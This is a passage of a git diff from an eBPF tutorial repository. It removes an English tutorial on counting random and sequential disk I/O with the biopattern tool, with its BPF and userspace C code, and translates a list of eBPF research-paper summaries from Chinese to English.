代码中,会根据两种不同的定义分别进行处理,这也是适配不同内核版本之间的变更常见的方案。 + +### 用户态代码 + +`biopattern` 工具的用户态代码负责从 BPF 映射中读取统计数据,并将其展示给用户。通过这种方式,系统管理员可以实时监控每个设备的 I/O 模式,从而更好地理解和优化系统的 I/O 性能。 + +主循环: + +```c + /* main: poll */ + while (1) { + sleep(env.interval); + + err = print_map(obj->maps.counters, partitions); + if (err) + break; + + if (exiting || --env.times == 0) + break; + } +``` + +这是 `biopattern` 工具的主循环,它的工作流程如下: + +- **等待**:使用 `sleep` 函数等待指定的时间间隔 (`env.interval`)。 +- **打印映射**:调用 `print_map` 函数打印 BPF 映射中的统计数据。 +- **退出条件**:如果收到退出信号 (`exiting` 为 `true`) 或者达到指定的运行次数 (`env.times` 达到 0),则退出循环。 + +打印映射函数: + +```c + static int print_map(struct bpf_map *counters, struct partitions *partitions) + { + __u32 total, lookup_key = -1, next_key; + int err, fd = bpf_map__fd(counters); + const struct partition *partition; + struct counter counter; + struct tm *tm; + char ts[32]; + time_t t; + + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_lookup_elem(fd, &next_key, &counter); + if (err < 0) { + fprintf(stderr, "failed to lookup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + total = counter.sequential + counter.random; + if (!total) + continue; + if (env.timestamp) { + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%-9s ", ts); + } + partition = partitions__get_by_dev(partitions, next_key); + printf("%-7s %5ld %5ld %8d %10lld\n", + partition ? partition->name : "Unknown", + counter.random * 100L / total, + counter.sequential * 100L / total, total, + counter.bytes / 1024); + } + + lookup_key = -1; + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_delete_elem(fd, &next_key); + if (err < 0) { + fprintf(stderr, "failed to cleanup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + } + + return 0; + } +``` + +`print_map` 函数负责从 BPF 映射中读取统计数据,并将其打印到控制台。其主要逻辑如下: + +- **遍历 BPF 映射**:使用 `bpf_map_get_next_key` 和 `bpf_map_lookup_elem` 函数遍历 BPF 映射,获取每个设备的统计数据。 +- **计算总数**:计算每个设备的随机和顺序 I/O 的总数。 +- **打印统计数据**:如果启用了时间戳 (`env.timestamp` 为 `true`),则首先打印当前时间。接着,打印设备名称、随机 I/O 的百分比、顺序 I/O 的百分比、总 I/O 数量和总数据量(以 KB 为单位)。 +- **清理 BPF 映射**:为了下一次的统计,使用 `bpf_map_get_next_key` 和 `bpf_map_delete_elem` 函数清理 BPF 映射中的所有条目。 + +## 总结 + +在本教程中,我们深入探讨了如何使用 eBPF 工具 biopattern 来实时监控和统计随机和顺序的磁盘 I/O。我们首先了解了随机和顺序磁盘 I/O 的重要性,以及它们对系统性能的影响。接着,我们详细介绍了 biopattern 的工作原理,包括如何定义和使用 BPF maps,如何处理不同版本的 Linux 内核中的追踪点变化,以及如何在 eBPF 程序中捕获和分析磁盘 I/O 事件。 + +您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +- 完整代码: +- bcc 工具: diff --git a/src/17-biopattern/README_en.md b/src/17-biopattern/README_en.md deleted file mode 100644 index 2a7cb9c..0000000 --- a/src/17-biopattern/README_en.md +++ /dev/null @@ -1,332 +0,0 @@ -# eBPF Tutorial by Example 17: Count Random/Sequential Disk I/O - -eBPF (Extended Berkeley Packet Filter) is a new technology in the Linux kernel that allows users to execute custom programmes in kernel space without changing the kernel code. This provides system administrators and developers with powerful tools to gain insight into and monitor system behaviour for optimisation. - -In this tutorial, we will explore how to use eBPF to write programs to count random and sequential disk I/O. Disk I/O is one of the key metrics of computer performance, especially in data-intensive applications. - -## Random/Sequential Disk I/O - -As technology advances and data volumes explode, disk I/O becomes a critical bottleneck in system performance. The performance of an application depends heavily on how it interacts with the storage tier. Therefore, it becomes especially important to deeply understand and optimise disk I/O, especially random and sequential I/O. - -1. **Random I/O**: Random I/O occurs when an application reads or writes data from or to a non-sequential location on the disk. The main characteristic of this I/O mode is that the disk head needs to move frequently between locations, causing it to be typically slower than sequential I/O. Typical scenarios that generate random I/O include database queries, file system metadata operations, and concurrent tasks in virtualised environments. - -2. **Sequential I/O**: In contrast to random I/O, sequential I/O occurs when an application continuously reads or writes blocks of data to or from disk. The advantage of this I/O mode is that the disk head can move continuously in one direction, which greatly increases the speed at which data can be read and written. Video playback, downloading or uploading large files, and continuous logging are typical applications that generate sequential I/O. - -To optimise storage performance, it is critical to understand both random and sequential disk I/O. For example, random I/O-sensitive applications typically perform far better on SSDs than on traditional hard drives because SSDs have virtually no addressing latency when dealing with random I/Os. Conversely, for applications with a lot of sequential I/O, it is much more critical to maximize the sequential read and write speed of the disk. - -In the rest of this tutorial, we will discuss in detail how to use the eBPF tool to monitor and count both types of disk I/O in real time, which will not only help us better understand the I/O behaviour of the system, but will also provide us with strong data for further performance optimization. - -## Biopattern - -Biopattern counts the percentage of random/sequential disk I/Os. - -First of all, make sure that you have installed libbpf and the associated toolset correctly, you can find the source code here: [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) - -Navigate to the `biopattern` source directory and compile it using the `make` command: - -```bash -cd ~/bpf-developer-tutorial/src/17-biopattern -make -``` - -After successful compilation, you should see the `biopattern` executable in the current directory. The basic runtime commands are as follows: - -```bash -sudo ./biopattern [interval] [count] -``` - -For example, to print the output once per second for 10 seconds, you can run: - -```console -$ sudo ./biopattern 1 10 -Tracing block device I/O requested seeks... Hit Ctrl-C to end. -DISK %RND %SEQ COUNT KBYTES -sr0 0 100 3 0 -sr1 0 100 8 0 -sda 0 100 1 4 -sda 100 0 26 136 -sda 0 100 1 4 -``` - -The output columns have the following meanings: - -- `DISK`: Name of the disk being tracked. -- `%RND`: Percentage of random I/O. -- `%SEQ`: percentage of sequential I/O. -- `COUNT`: Number of I/O requests in the specified interval. -- `KBYTES`: amount of data (in KB) read and written in the specified time interval. - -From the above output, we can draw the following conclusions: - -- The `sr0` and `sr1` devices performed mostly sequential I/O during the observation period, but the amount of data was small. -- The `sda` device performed only random I/O during some time periods and only sequential I/O during other time periods. - -This information can help us understand the I/O pattern of the system so that we can target optimisation. - -## eBPF Biopattern Implementation Principles - -First, let's look at the eBPF kernel state code at the heart of biopattern: - -```c -#include -#include -#include -#include "biopattern.h" -#include "maps.bpf.h" -#include "core_fixes.bpf.h" - -const volatile bool filter_dev = false; -const volatile __u32 targ_dev = 0; - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 64); - __type(key, u32); - __type(value, struct counter); -} counters SEC(".maps"); - -SEC("tracepoint/block/block_rq_complete") -int handle__block_rq_complete(void *args) -{ - struct counter *counterp, zero = {}; - sector_t sector; - u32 nr_sector; - u32 dev; - - if (has_block_rq_completion()) { - struct trace_event_raw_block_rq_completion___x *ctx = args; - sector = BPF_CORE_READ(ctx, sector); - nr_sector = BPF_CORE_READ(ctx, nr_sector); - dev = BPF_CORE_READ(ctx, dev); - } else { - struct trace_event_raw_block_rq_complete___x *ctx = args; - sector = BPF_CORE_READ(ctx, sector); - nr_sector = BPF_CORE_READ(ctx, nr_sector); - dev = BPF_CORE_READ(ctx, dev); - } - - if (filter_dev && targ_dev != dev) - return 0; - - counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); - if (!counterp) - return 0; - if (counterp->last_sector) { - if (counterp->last_sector == sector) - __sync_fetch_and_add(&counterp->sequential, 1); - else - __sync_fetch_and_add(&counterp->random, 1); - __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); - } - counterp->last_sector = sector + nr_sector; - return 0; -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -Global variable definitions: - -```c - const volatile bool filter_dev = false; - const volatile __u32 targ_dev = 0; -``` - -These two global variables are used for device filtering. `filter_dev` determines whether device filtering is enabled or not, and `targ_dev` is the identifier of the target device we want to track. - -BPF map definition: - -```c - struct { __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 64); __type(key, u32); - __type(value, struct counter); - } counters SEC(".maps"). -``` - -This part of the code defines a BPF map of type hash table. The key of the map is the identifier of the device, and the value is a `counter` struct, which is used to store the I/O statistics of the device. - -The tracepoint function: - -```c - SEC("tracepoint/block/block_rq_complete") - int handle__block_rq_complete(void *args) - { - struct counter *counterp, zero = {}; - sector_t sector; - u32 nr_sector; - u32 dev; - - if (has_block_rq_completion()) { - struct trace_event_raw_block_rq_completion___x *ctx = args; - sector = BPF_CORE_READ(ctx, sector); - nr_sector = BPF_CORE_READ(ctx, nr_sector); - dev = BPF_CORE_READ(ctx, dev); - } else { - struct trace_event_raw_block_rq_complete___x *ctx = args; - sector = BPF_CORE_READ(ctx, sector); - nr_sector = BPF_CORE_READ(ctx, nr_sector); - dev = BPF_CORE_READ(ctx, dev); - } - - if (filter_dev && targ_dev != dev) - return 0; - - counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); - if (!counterp) - return 0; - if (counterp->last_sector) { - if (counterp->last_sector == sector) - __sync_fetch_and_add(&counterp->sequential, 1); - else - __sync_fetch_and_add(&counterp->random, 1); - __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); - } - counterp->last_sector = sector + nr_sector; - return 0; - } -``` - -In Linux, a trace point called `block_rq_complete` is triggered every time an I/O request for a block device completes. This provides an opportunity to capture these events with eBPF and further analyse the I/O patterns. - -Main Logic Analysis: - -- **Extracting I/O request information**: get information about the I/O request from the incoming parameters. There are two possible context structures depending on the return value of `has_block_rq_completion`. This is because different versions of the Linux kernel may have different tracepoint definitions. In either case, we extract the sector number `(sector)`, the number of sectors `(nr_sector)` and the device identifier `(dev)` from the context. - -- **Device filtering**: If device filtering is enabled `(filter_dev` is `true` ) and the current device is not the target device `(targ_dev` ), it is returned directly. This allows the user to track only specific devices, not all devices. - -- **Statistics update**: - - - **Lookup or initialise statistics**: use the `bpf_map_lookup_or_try_init` function to lookup or initialise statistics related to the current device. If there is no statistics for the current device in the map, it will be initialised using the `zero` structure. -- **Determine the I/O mode**: Based on the sector number of the current I/O request and the previous I/O request, we can determine whether the current request is random or sequential. If the sector numbers of the two requests are the same, then it is sequential; otherwise, it is random. We then use the `__sync_fetch_and_add` function to update the corresponding statistics. This is an atomic operation that ensures data consistency in a concurrent environment. -- **Update the amount of data**: we also update the total amount of data for the device, which is done by multiplying the number of sectors `(nr_sector` ) by 512 (the number of bytes per sector). -- **Update the sector number of the last I/O request**: for the next comparison, we update the value of `last_sector`. - -In some versions of the Linux kernel, the naming and structure of the tracepoint has changed due to the introduction of a new tracepoint, `block_rq_error`. This means that the structural name of the former `block_rq_complete` tracepoint has been changed from `trace_event_raw_block_rq_complete` to `trace_event_raw_block_rq_completion`, a change which may cause compatibility issues with eBPF programs on different versions of the kernel. This change may cause compatibility issues with eBPF programs on different versions of the kernel. - -To address this issue, the `biopattern` utility introduces a mechanism to dynamically detect which trace point structure is currently used by the kernel, namely the `has_block_rq_completion` function. - -1. **Define two trace point structures**: - -```c - struct trace_event_raw_block_rq_complete___x { - dev_t dev; - sector_t sector; - unsigned int nr_sector; - } __attribute__((preserve_access_index)); - - struct trace_event_raw_block_rq_completion___x { - dev_t dev; - sector_t sector; - unsigned int nr_sector; - } __attribute__((preserve_access_index)); -``` - -Two tracepoint structures are defined here, corresponding to different versions of the kernel. Each structure contains a device identifier `(dev` ), sector number `(sector` ), and number of sectors `(nr_sector` ). - -**Dynamic detection of trackpoint structures**: - -```c - static __always_inline bool has_block_rq_completion() - { - if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x)) - return true; - return false; - } -``` - -The `has_block_rq_completion` function uses the `bpf_core_type_exists` function to detect the presence of the structure `trace_event_raw_block_rq_completion___x` in the current kernel. If it exists, the function returns `true`, indicating that the current kernel is using the new tracepoint structure; otherwise, it returns `false`, indicating that it is using the old structure. The two different definitions are handled separately in the corresponding eBPF code, which is a common solution for adapting to changes between kernel versions. - -### User State Code - -The `biopattern` tool's userland code is responsible for reading statistics from the BPF mapping and presenting them to the user. In this way, system administrators can monitor the I/O patterns of each device in real time to better understand and optimise the I/O performance of the system. - -1. Main loop - -```c - /* main: poll */ - while (1) { - sleep(env.interval); - - err = print_map(obj->maps.counters, partitions); - if (err) - break; - - if (exiting || --env.times == 0) - break; - } -``` - -This is the main loop of the `biopattern` utility, and its workflow is as follows: - -- **Wait**: use the `sleep` function to wait for the specified interval `(env.interval` ). -- `print_map`: call `print_map` function to print the statistics in BPF map. -- **Exit condition**: if an exit signal is received `(exiting` is `true` ) or if the specified number of runs is reached `(env.times` reaches 0), the loop exits. - -Print mapping function: - -```c - static int print_map(struct bpf_map *counters, struct partitions *partitions) - { - __u32 total, lookup_key = -1, next_key; - int err, fd = bpf_map__fd(counters); - const struct partition *partition; - struct counter counter; - struct tm *tm; - char ts[32]; - time_t t; - - while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { - err = bpf_map_lookup_elem(fd, &next_key, &counter); - if (err < 0) { - fprintf(stderr, "failed to lookup counters: %d\n", err); - return -1; - } - lookup_key = next_key; - total = counter.sequential + counter.random; - if (!total) - continue; - if (env.timestamp) { - time(&t); - tm = localtime(&t); - strftime(ts, sizeof(ts), "%H:%M:%S", tm); - printf("%-9s ", ts); - } - partition = partitions__get_by_dev(partitions, next_key); - printf("%-7s %5ld %5ld %8d %10lld\n", - partition ? partition->name : "Unknown", - counter.random * 100L / total, - counter.sequential * 100L / total, total, - counter.bytes / 1024); - } - - lookup_key = -1; - while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { - err = bpf_map_delete_elem(fd, &next_key); - if (err < 0) { - fprintf(stderr, "failed to cleanup counters: %d\n", err); - return -1; - } - lookup_key = next_key; - } - - return 0; - } -``` - -The `print_map` function is responsible for reading statistics from the BPF map and printing them to the console. The main logic is as follows: - -- **Traverse the BPF map**: Use the `bpf_map_get_next_key` and `bpf_map_lookup_elem` functions to traverse the BPF map and get the statistics for each device. -- **Calculate totals**: Calculate the total number of random and sequential I/Os for each device. -- **Print statistics**: If timestamp is enabled `(env.timestamp` is `true` ), the current time is printed first. Next, the device name, percentage of random I/O, percentage of sequential I/O, total I/O, and total data in KB are printed. -- **Cleaning up the BPF map**: For the next count, use the `bpf_map_get_next_key` and `bpf_map_delete_elem` functions to clean up all entries in the BPF map. - -## Summary - -In this tutorial, we have taken an in-depth look at how to use the eBPF tool biopattern to monitor and count random and sequential disk I/O in real-time. we started by understanding the importance of random and sequential disk I/O and their impact on system performance. We then describe in detail how biopattern works, including how to define and use BPF maps, how to deal with tracepoint variations in different versions of the Linux kernel, and how to capture and analyse disk I/O events in an eBPF program. - -You can visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and a complete tutorial. - -- Source repo: -- bcc tool: - -> The original link of this article: diff --git a/src/18-further-reading/README.md b/src/18-further-reading/README.md index 3a71301..458612e 100644 --- a/src/18-further-reading/README.md +++ b/src/18-further-reading/README.md @@ -1,149 +1,140 @@ -# 更多的参考资料:论文、项目等等 +# More Reference Materials: papers, projects -可以在这里找到更多关于 eBPF 的信息: +You may find more about eBPF in these places: -- 一个关于 eBPF 相关内容和信息的详细列表: -- eBPF 相关项目、教程: +- A curated list of awesome projects related to eBPF: +- A website of eBPF projects and tutorials: -这是我近年来读过的与 eBPF 相关的论文列表,可能对于对 eBPF 相关研究感兴趣的人有所帮助。 +This is also list of eBPF related papers I read in recent years, might be helpful for people who are interested in eBPF related research. -eBPF(扩展的伯克利数据包过滤器)是一种新兴的技术,允许在 Linux 内核中安全地执行用户提供的程序。近年来,它因加速网络处理、增强可观察性和实现可编程数据包处理而得到了广泛的应用。此文档列出了过去几年关于 eBPF 的一些关键研究论文。这些论文涵盖了 eBPF 的几个方面,包括加速分布式系统、存储和网络,正式验证 eBPF 的 JIT 编译器和验证器,将 eBPF 用于入侵检测,以及从 eBPF 程序自动生成硬件设计。 +eBPF (extended Berkeley Packet Filter) is an emerging technology that allows safe execution of user-provided programs in the Linux kernel. It has gained widespread adoption in recent years for accelerating network processing, enhancing observability, and enabling programmable packet processing. -一些关键亮点: +This document list some key research papers on eBPF over the past few years. The papers cover several aspects of eBPF, including accelerating distributed systems, storage, and networking, formally verifying the eBPF JIT compiler and verifier, applying eBPF for intrusion detection, and automatically generating hardware designs from eBPF programs. -- eBPF 允许在内核中执行自定义函数,以加速分布式协议、存储引擎和网络应用,与传统的用户空间实现相比,可以提高吞吐量和降低延迟。 -- eBPF 组件(如 JIT 和验证器)的正式验证确保了正确性,并揭示了实际实现中的错误。 -- eBPF 的可编程性和效率使其适合在内核中完全构建入侵检测和网络监控应用。 -- 从 eBPF 程序中自动生成硬件设计允许软件开发人员快速生成网络卡中的优化数据包处理管道。 +Some key highlights: -这些论文展示了 eBPF 在加速系统、增强安全性和简化网络编程方面的多功能性。随着 eBPF 的采用不断增加,它是一个与性能、安全性、硬件集成和易用性相关的系统研究的重要领域。 +- eBPF enables executing custom functions in the kernel to accelerate distributed protocols, storage engines, and networking applications with improved throughput and lower latency compared to traditional userspace implementations. +- Formal verification of eBPF components like JIT and verifier ensures correctness and reveals bugs in real-world implementations. +- eBPF's programmability and efficiency make it suitable for building intrusion detection and network monitoring applications entirely in the kernel. +- Automated synthesis of hardware designs from eBPF programs allows software developers to quickly generate optimized packet processing pipelines in network cards. -如果您有任何建议或添加论文的意见,请随时开放一个问题或PR。此列表创建于 2023.10,未来将添加新的论文。 +The papers demonstrate eBPF's versatility in accelerating systems, enhancing security, and simplifying network programming. As eBPF adoption grows, it is an important area of systems research with many open problems related to performance, safety, hardware integration, and ease of use. -> 如果您对 eBPF 有些进一步的兴趣的话,也可以查看我们在 [eunomia-bpf](https://github.com/eunomia-bpf) 的开源项目和 [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 的 eBPF 教程。我也在寻找 2024/2025 年系统和网络领域的 PhD 相关机会,这是我的 [Github](https://github.com/yunwei37) 和 [邮箱](yunwei356@gmail.com)。 +If you have any suggestions or adding papers, please feel free to open an issue or PR. The list was created in 2023.10, New papers will be added in the future. + +> Check out our open-source projects at [eunomia-bpf](https://github.com/eunomia-bpf) and eBPF tutorials at [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial). I'm also looking for a PhD position in the area of systems and networking in 2024/2025. My [Github](https://github.com/yunwei37) and [email](yunwei356@gmail.com). ## XRP: In-Kernel Storage Functions with eBPF -随着微秒级 NVMe 存储设备的出现,Linux 内核存储堆栈开销变得显著,几乎使访问时间翻倍。我们介绍了 XRP,一个框架,允许应用程序从 eBPF 在 NVMe 驱动程序中的钩子执行用户定义的存储功能,如索引查找或聚合,安全地绕过大部分内核的存储堆栈。为了保持文件系统的语义,XRP 将少量的内核状态传播到其 NVMe 驱动程序钩子,在那里调用用户注册的 eBPF 函数。我们展示了如何利用 XRP 显著提高两个键值存储,BPF-KV,一个简单的 B+ 树键值存储,和 WiredTiger,一个流行的日志结构合并树存储引擎的吞吐量和延迟。 +With the emergence of microsecond-scale NVMe storage devices, the Linux kernel storage stack overhead has become significant, almost doubling access times. We present XRP, a framework that allows applications to execute user-defined storage functions, such as index lookups or aggregations, from an eBPF hook in the NVMe driver, safely bypassing most of the kernel’s storage stack. To preserve file system semantics, XRP propagates a small amount of kernel state to its NVMe driver hook where the user-registered eBPF functions are called. We show how two key-value stores, BPF-KV, a simple B+-tree key-value store, and WiredTiger, a popular log-structured merge tree storage engine, can leverage XRP to significantly improve throughput and latency. -OSDI '22 最佳论文: +OSDI '22 Best Paper: ## Specification and verification in the field: Applying formal methods to BPF just-in-time compilers in the Linux kernel -本文描述了我们将形式方法应用于 Linux 内核中的一个关键组件,即 Berkeley 数据包过滤器 (BPF) 虚拟机的即时编译器 ("JIT") 的经验。我们使用 Jitterbug 验证这些 JIT,这是第一个提供 JIT 正确性的精确规范的框架,能够排除实际错误,并提供一个自动化的证明策略,该策略可以扩展到实际实现。使用 Jitterbug,我们设计、实施并验证了一个新的针对 32 位 RISC-V 的 BPF JIT,在五个其他部署的 JIT 中找到并修复了 16 个之前未知的错误,并开发了新的 JIT 优化;所有这些更改都已上传到 Linux 内核。结果表明,在一个大型的、未经验证的系统中,通过仔细设计规范和证明策略,可以构建一个经过验证的组件。 +This paper describes our experience applying formal methods to a critical component in the Linux kernel, the just-in-time compilers ("JITs") for the Berkeley Packet Filter (BPF) virtual machine. We verify these JITs using Jitterbug, the first framework to provide a precise specification of JIT correctness that is capable of ruling out real-world bugs, and an automated proof strategy that scales to practical implementations. Using Jitterbug, we have designed, implemented, and verified a new BPF JIT for 32-bit RISC-V, found and fixed 16 previously unknown bugs in five other deployed JITs, and developed new JIT optimizations; all of these changes have been upstreamed to the Linux kernel. The results show that it is possible to build a verified component within a large, unverified system with careful design of specification and proof strategy. OSDI 20: ## λ-IO: A Unified IO Stack for Computational Storage -新兴的计算存储设备为存储内计算提供了一个机会。它减少了主机与设备之间的数据移动开销,从而加速了数据密集型应用程序。在这篇文章中,我们介绍 λ-IO,一个统一的 IO 堆栈,跨主机和设备管理计算和存储资源。我们提出了一套设计 - 接口、运行时和调度 - 来解决三个关键问题。我们在全堆栈软件和硬件环境中实施了 λ-IO,并使用合成和实际应用程序对其 - -进行评估,与 Linux IO 相比,显示出高达 5.12 倍的性能提升。 +The emerging computational storage device offers an opportunity for in-storage computing. It alleviates the overhead of data movement between the host and the device, and thus accelerates data-intensive applications. In this paper, we present λ-IO, a unified IO stack managing both computation and storage resources across the host and the device. We propose a set of designs – interface, runtime, and scheduling – to tackle three critical issues. We implement λ-IO in full-stack software and hardware environment, and evaluate it with synthetic and real applications against Linux IO, showing up to 5.12× performance improvement. FAST23: ## Extension Framework for File Systems in User space -用户文件系统相对于其内核实现提供了许多优势,例如开发的简易性和更好的系统可靠性。然而,它们会导致重大的性能损失。我们观察到现有的用户文件系统框架非常通用;它们由一个位于内核中的最小干预层组成,该层简单地将所有低级请求转发到用户空间。虽然这种设计提供了灵活性,但由于频繁的内核-用户上下文切换,它也严重降低了性能。 +User file systems offer numerous advantages over their in-kernel implementations, such as ease of development and better system reliability. However, they incur heavy performance penalty. We observe that existing user file system frameworks are highly general; they consist of a minimal interposition layer in the kernel that simply forwards all low-level requests to user space. While this design offers flexibility, it also severely degrades performance due to frequent kernel-user context switching. -这项工作介绍了 ExtFUSE,一个用于开发可扩展用户文件系统的框架,该框架还允许应用程序在内核中注册"薄"的专用请求处理程序,以满足其特定的操作需求,同时在用户空间中保留复杂的功能。我们使用两个 FUSE 文件系统对 ExtFUSE 进行评估,结果表明 ExtFUSE 可以通过平均不到几百行的改动来提高用户文件系统的性能。ExtFUSE 可在 GitHub 上找到。 +This work introduces ExtFUSE, a framework for developing extensible user file systems that also allows applications to register "thin" specialized request handlers in the kernel to meet their specific operative needs, while retaining the complex functionality in user space. Our evaluation with two FUSE file systems shows that ExtFUSE can improve the performance of user file systems with less than a few hundred lines on average. ExtFUSE is available on GitHub. ATC 19: ## Electrode: Accelerating Distributed Protocols with eBPF -在标准的Linux内核网络栈下实现分布式协议可以享受到负载感知的CPU缩放、高兼容性以及强大的安全性和隔离性。但由于过多的用户-内核切换和内核网络栈遍历,其性能较低。我们介绍了Electrode,这是一套为分布式协议设计的基于eBPF的性能优化。这些优化在网络栈之前在内核中执行,但实现了与用户空间中实现的相似功能(例如,消息广播,收集ack的仲裁),从而避免了用户-内核切换和内核网络栈遍历所带来的开销。我们展示,当应用于经典的Multi-Paxos状态机复制协议时,Electrode可以提高其吞吐量高达128.4%,并将延迟降低高达41.7%。 +Implementing distributed protocols under a standard Linux kernel networking stack enjoys the benefits of load-aware CPU scaling, high compatibility, and robust security and isolation. However, it suffers from low performance because of excessive user-kernel crossings and kernel networking stack traversing. We present Electrode with a set of eBPF-based performance optimizations designed for distributed protocols. These optimizations get executed in the kernel before the networking stack but achieve similar functionalities as were implemented in user space (e.g., message broadcasting, collecting quorum of acknowledgments), thus avoiding the overheads incurred by user-kernel crossings and kernel networking stack traversing. We show that when applied to a classic Multi-Paxos state machine replication protocol, Electrode improves its throughput by up to 128.4% and latency by up to 41.7%. -NSDI 23: [链接](https://www.usenix.org/conference/nsdi23/presentation/zhou) +NSDI 23: ## BMC: Accelerating Memcached using Safe In-kernel Caching and Pre-stack Processing -内存键值存储是帮助扩展大型互联网服务的关键组件,通过提供对流行数据的低延迟访问。Memcached是最受欢迎的键值存储之一,由于Linux网络栈固有的性能限制,当使用高速网络接口时,其性能不高。虽然可以使用DPDK基础方案绕过Linux网络栈,但这种方法需要对软件栈进行完全重新设计,而且在客户端负载较低时也会导致高CPU利用率。 +In-memory key-value stores are critical components that help scale large internet services by providing low-latency access to popular data. Memcached, one of the most popular key-value stores, suffers from performance limitations inherent to the Linux networking stack and fails to achieve high performance when using high-speed network interfaces. While the Linux network stack can be bypassed using DPDK based solutions, such approaches require a complete redesign of the software stack and induce high CPU utilization even when client load is low. -为了克服这些限制,我们提出了BMC,这是一个为Memcached设计的内核缓存,可以在执行标准网络栈之前服务于请求。对BMC缓存的请求被视为NIC中断的一部分,这允许性能随着为NIC队列服务的核心数量而扩展。为确保安全,BMC使用eBPF实现。尽管eBPF具有安全约束,但我们展示了实现复杂缓存服务是可能的。因为BMC在商用硬件上运行,并且不需要修改Linux内核或Memcached应用程序,所以它可以在现有系统上广泛部署。BMC优化了Facebook样式的小型请求的处理时间。在这个目标工作负载上,我们的评估显示,与原始的Memcached应用程序相比,BMC的吞吐量提高了高达18倍,与使用SO_REUSEPORT套接字标志的优化版Memcached相比,提高了高达6倍。此外,我们的结果还显示,对于非目标工作负载,BMC的开销可以忽略不计,并且不会降低吞吐量。 +To overcome these limitations, we present BMC, an in-kernel cache for Memcached that serves requests before the execution of the standard network stack. Requests to the BMC cache are treated as part of the NIC interrupts, which allows performance to scale with the number of cores serving the NIC queues. To ensure safety, BMC is implemented using eBPF. Despite the safety constraints of eBPF, we show that it is possible to implement a complex cache service. Because BMC runs on commodity hardware and requires modification of neither the Linux kernel nor the Memcached application, it can be widely deployed on existing systems. BMC optimizes the processing time of Facebook-like small-size requests. On this target workload, our evaluations show that BMC improves throughput by up to 18x compared to the vanilla Memcached application and up to 6x compared to an optimized version of Memcached that uses the SO_REUSEPORT socket flag. In addition, our results also show that BMC has negligible overhead and does not deteriorate throughput when treating non-target workloads. -NSDI 21: [链接](https://www.usenix.org/conference/nsdi21/presentation/ghigoff) +NSDI 21: ## hXDP: Efficient Software Packet Processing on FPGA NICs -FPGA加速器在NIC上使得从CPU卸载昂贵的数据包处理任务成为可能。但是,FPGA有限的资源可能需要在多个应用程序之间共享,而编程它们则很困难。 +FPGA accelerators on the NIC enable the offloading of expensive packet processing tasks from the CPU. However, FPGAs have limited resources that may need to be shared among diverse applications, and programming them is difficult. -我们提出了一种在FPGA上运行Linux的eXpress Data Path程序的解决方案,这些程序使用eBPF编写,仅使用可用硬件资源的一部分,同时匹配高端CPU的性能。eBPF的迭代执行模型不适合FPGA加速器。尽管如此,我们展示了,当针对一个特定的FPGA执行器时,一个eBPF程序的许多指令可以被压缩、并行化或完全删除,从而显著提高性能。我们利用这一点设计了hXDP,它包括(i)一个优化编译器,该编译器并行化并将eBPF字节码转换为我们定义的扩展eBPF指令集架构;(ii)一个在FPGA上执行这些指令的软处理器;以及(iii)一个基于FPGA的基础设施,提供XDP的maps和Linux内核中定义的helper函数。 +We present a solution to run Linux's eXpress Data Path programs written in eBPF on FPGAs, using only a fraction of the available hardware resources while matching the performance of high-end CPUs. The iterative execution model of eBPF is not a good fit for FPGA accelerators. Nonetheless, we show that many of the instructions of an eBPF program can be compressed, parallelized or completely removed, when targeting a purpose-built FPGA executor, thereby significantly improving performance. We leverage that to design hXDP, which includes (i) an optimizing-compiler that parallelizes and translates eBPF bytecode to an extended eBPF Instruction-set Architecture defined by us; a (ii) soft-processor to execute such instructions on FPGA; and (iii) an FPGA-based infrastructure to provide XDP's maps and helper functions as defined within the Linux kernel. -我们在FPGA NIC上实现了hXDP,并评估了其运行真实世界的未经修改的eBPF程序的性能。我们的实现以156.25MHz的速度时钟,使用约15%的FPGA资源,并可以运行动态加载的程序。尽管有这些适度的要求,但它达到了高端CPU核心的数据包处理吞吐量,并提供了10倍低的数据包转发延迟。 +We implement hXDP on an FPGA NIC and evaluate it running real-world unmodified eBPF programs. Our implementation is clocked at 156.25MHz, uses about 15% of the FPGA resources, and can run dynamically loaded programs. Despite these modest requirements, it achieves the packet processing throughput of a high-end CPU core and provides a 10x lower packet forwarding latency. -OSDI 20: [链接](https://www.usenix.org/conference/osdi20/presentation/brunella) +OSDI 20: ## Network-Centric Distributed Tracing with DeepFlow: Troubleshooting Your Microservices in Zero Code -微服务正变得越来越复杂,给传统的性能监控解决方案带来了新的挑战。一方面,微服务的快速演变给现有的分布式跟踪框架的使用和维护带来了巨大的负担。另一方面,复杂的基础设施增加了网络性能问题的概率,并在网络侧创造了更多的盲点。在这篇论文中,我们介绍了 DeepFlow,一个用于微服务故障排除的以网络为中心的分布式跟踪框架。DeepFlow 通过一个以网络为中心的跟踪平面和隐式的上下文传播提供开箱即用的跟踪。此外,它消除了网络基础设施中的盲点,以低成本方式捕获网络指标,并增强了不同组件和层之间的关联性。我们从分析和实证上证明,DeepFlow 能够准确地定位微服务性能异常,而开销几乎可以忽略不计。DeepFlow 已经为超过26家公司发现了71多个关键性能异常,并已被数百名开发人员所使用。我们的生产评估显示,DeepFlow 能够为用户节省数小时的仪表化工作,并将故障排除时间从数小时缩短到几分钟。 +Microservices are becoming more complicated, posing new challenges for traditional performance 